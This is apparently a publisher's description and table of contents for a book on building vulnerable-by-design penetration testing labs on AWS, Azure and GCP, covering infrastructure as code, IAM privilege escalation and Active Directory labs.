The significant increase in the number of cloud-related threats and issues has led to a surge in the demand for cloud security professionals. This book will help you set up vulnerable-by-design environments in the cloud to minimize the risks involved while learning all about cloud penetration testing and ethical hacking. This step-by-step guide begins by helping you design and build penetration testing labs that mimic modern cloud environments running on AWS, Azure, and Google Cloud Platform (GCP). Next, you’ll find out how to use infrastructure as code (IaC) solutions to manage a variety of lab environments in the cloud. As you advance, you’ll discover how generative AI tools, such as ChatGPT, can be leveraged to accelerate the preparation of IaC templates and configurations. You’ll also learn how to validate vulnerabilities by exploiting misconfigurations and vulnerabilities using various penetration testing tools and techniques. Finally, you’ll explore several practical strategies for managing the complexity, cost, and risks involved when dealing with penetration testing lab environments in the cloud. By the end of this penetration testing book, you’ll be able to design and build cost-effective vulnerable cloud lab environments where you can experiment and practice different types of attacks and penetration testing techniques.

What you will learn

  • Build vulnerable-by-design labs that mimic modern cloud environments
  • Find out how to manage the risks associated with cloud lab environments
  • Use infrastructure as code to automate lab infrastructure deployments
  • Validate vulnerabilities present in penetration testing labs
  • Find out how to manage the costs of running labs on AWS, Azure, and GCP
  • Set up IAM privilege escalation labs for advanced penetration testing
  • Use generative AI tools to generate infrastructure as code templates
  • Import the Kali Linux Generic Cloud Image to the cloud with ease


Table of Contents

15 Chapters
Preface
Part 1: A Gentle Introduction to Vulnerable-by-Design Environments
Chapter 1: Getting Started with Penetration Testing Labs in the Cloud
Chapter 2: Preparing Our First Vulnerable Cloud Lab Environment
Chapter 3: Succeeding with Infrastructure as Code Tools and Strategies
Part 2: Setting Up Isolated Penetration Testing Lab Environments in the Cloud
Chapter 4: Setting Up Isolated Penetration Testing Lab Environments on GCP
Chapter 5: Setting Up Isolated Penetration Testing Lab Environments on Azure
Chapter 6: Setting Up Isolated Penetration Testing Lab Environments on AWS
Part 3: Exploring Advanced Strategies and Best Practices in Lab Environment Design
Chapter 7: Setting Up an IAM Privilege Escalation Lab
Chapter 8: Designing and Building a Vulnerable Active Directory Lab
Chapter 9: Recommended Strategies and Best Practices
Index
Other Books You May Enjoy

